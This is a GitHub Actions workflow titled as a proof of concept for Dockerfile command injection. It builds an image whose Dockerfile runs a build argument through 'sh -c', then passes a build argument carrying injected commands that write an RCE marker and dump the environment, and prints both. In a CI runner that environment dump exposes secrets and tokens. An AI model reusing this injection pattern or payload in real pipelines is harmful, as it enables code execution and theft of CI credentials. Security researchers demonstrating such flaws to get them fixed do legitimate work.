name: Dockerfile Injection Exploit PoC

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout (dummy)
        run: echo "Starting PoC..."

      - name: Build malicious Docker image
        run: |
          echo "FROM alpine
ARG PYTHON_VERSION
RUN echo \"Injected version: \${PYTHON_VERSION}\" && sh -c \"\${PYTHON_VERSION}\"" > Dockerfile

          docker build \
            --build-arg PYTHON_VERSION="echo RCE_SUCCESS > /RCE_MARKER; env > /env_dump" \
            -t injected-image .

      - name: Verify RCE Marker
        run: |
          docker run --rm injected-image cat /RCE_MARKER

      - name: Dump Environment (Proof of Access)
        run: |
          docker run --rm injected-image cat /env_dump
